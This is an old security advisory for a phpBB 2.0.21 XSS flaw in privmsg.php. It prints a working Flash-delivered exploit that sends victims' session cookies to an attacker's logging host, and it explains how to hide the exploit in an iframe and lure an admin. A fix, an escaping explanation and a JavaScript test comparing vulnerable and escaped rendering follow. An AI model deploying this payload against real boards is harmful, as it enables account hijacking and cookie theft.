phpBB (privmsg.php) XSS Exploit

By: Demential
Web: http://headburn.altervista.org
E-mail: info@xxxxxxxxxxx
phpBB website: http://phpbb.com

Exploit tested on phpBB 2.0.21

Secunia.com said:

  Input passed to the form field "Message body" in privmsg.php is not
  properly sanitised before it is returned to the user when sending
  messages to a non-existent user. This can be exploited to execute
  arbitrary HTML and script code in a user's browser session in context
  of an affected site.

In other words: when the recipient does not exist, privmsg.php re-displays
the compose form and writes the submitted message body back into the
<textarea> without escaping it. A message that begins with </textarea>
closes the element early, and everything after it is parsed as live markup,
including a <script> block.

The Exploit:

Create a Shockwave Flash file (ActionScript 2) with this code. The timeline
variables are exactly the form fields privmsg.php expects; getURL() with the
"POST" method submits them to the board. The "_self" target loads the
response into the frame the movie is embedded in, so the injected script
runs in the forum's origin from inside the hidden iframe below. victim.com
is a placeholder for the target board and site.com/cookie.php for the
attacker's cookie-logging host.

  var username:String = "user_that_doesnt_exist";
  var subject:String = "Xss Exploitation";
  var message:String = "</textarea><script>document.location= 'http://site.com/cookie.php?c=' + document.cookie </script>";
  var folder:String = "inbox";
  var mode:String = "post";
  var post:String = "Submit";
  getURL("http://victim.com/phpBB2/privmsg.php", "_self", "POST");

Put it into a web page (the zero-size iframe hides the request from the
visitor):

  <html>
  <head>
  <title>Put a title here</title>
  </head>
  <body>
  <p>Put some text here</p>
  <iframe src="http://yoursite.com/exploit.swf" frameborder="0" height="0" width="0"></iframe>
  </body>
  </html>

Send the page's URL to the admin (or a normal user). The target must be
logged in to the board when the page loads: the Flash movie's POST carries
the victim's phpBB session cookie, so the reflected XSS is delivered
cross-site with no action from the victim beyond opening the page.

Fixing:

open phpBB2/privmsg.php

find:

  if (!($to_userdata = $db->sql_fetchrow($result)))
  {
      $error = TRUE;
      $error_msg = $lang['No_such_user'];

replace with:

  if (!($to_userdata = $db->sql_fetchrow($result)))
  {
      $error = TRUE;
      echo "Sorry, but no such user exists.";
      exit;

Note that this patch only sidesteps the bug: it aborts the request before
the compose form (and with it the unescaped message) is sent back, at the
cost of bypassing the board's template and language system. The actual
defect is the unescaped echo of the message body into the form, so the
proper fix is to HTML-escape that value (for example with
htmlspecialchars()) wherever it is written back into the page.
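The following is an added example, not code from this advisory or from phpBB. It models in JavaScript (rather than phpBB's PHP) what the vulnerable re-display of the compose form does with the advisory's payload, next to the escaped version that a real fix would use, and includes a small oracle that checks whether a <script> element ends up outside the <textarea>. The form markup, function names and the payload constant are assumptions made for this example.

```javascript
// Added example (not phpBB code): models privmsg.php echoing the "Message body"
// back into a <textarea> when the recipient does not exist, once unescaped
// (the vulnerable behaviour) and once HTML-escaped (the fix).

// Minimal escaper equivalent to PHP's htmlspecialchars($s, ENT_QUOTES).
// '&' must be replaced first so the other entities are not double-encoded.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#039;");
}

// Vulnerable rendering: the submitted message is concatenated straight into
// the markup, so a leading "</textarea>" in the message closes the element.
function renderReplyFormVulnerable(message) {
  return '<form method="post" action="privmsg.php">' +
         '<textarea name="message">' + message + '</textarea>' +
         '</form>';
}

// Hardened rendering: the message is escaped before it is placed in the
// textarea, so "<" and ">" can no longer open or close any element.
function renderReplyFormFixed(message) {
  return '<form method="post" action="privmsg.php">' +
         '<textarea name="message">' + escapeHtml(message) + '</textarea>' +
         '</form>';
}

// Test oracle: does a <script> tag appear outside the textarea's content?
// Browsers tokenise <textarea> as RCDATA: its content ends at the first
// "</textarea" (case-insensitive), and whatever follows is parsed as markup.
function hasScriptOutsideTextarea(html) {
  const lower = html.toLowerCase();
  const open = lower.indexOf("<textarea");
  const close = lower.indexOf("</textarea", open);
  if (open === -1 || close === -1) return lower.includes("<script");
  const outside = lower.slice(0, open) + lower.slice(close);
  return outside.includes("<script");
}

// The payload quoted in the advisory, constructed here as test input.
// site.com/cookie.php is the advisory's placeholder for a cookie logger.
const ADVISORY_PAYLOAD =
  "</textarea><script>document.location= 'http://site.com/cookie.php?c=' + document.cookie </script>";

// Stand-alone run: report whether each rendering lets the payload break out.
console.log("vulnerable:", hasScriptOutsideTextarea(renderReplyFormVulnerable(ADVISORY_PAYLOAD)));
console.log("fixed:     ", hasScriptOutsideTextarea(renderReplyFormFixed(ADVISORY_PAYLOAD)));
```

The oracle is deliberately crude (a substring check, not an HTML parser), but it captures the one property that matters here: once the reflected value can close the <textarea>, the rest of it is no longer text. Escaping the value at the point where it is written into the page is what removes that property; aborting the request early, as the advisory's patch does, merely avoids reaching that point.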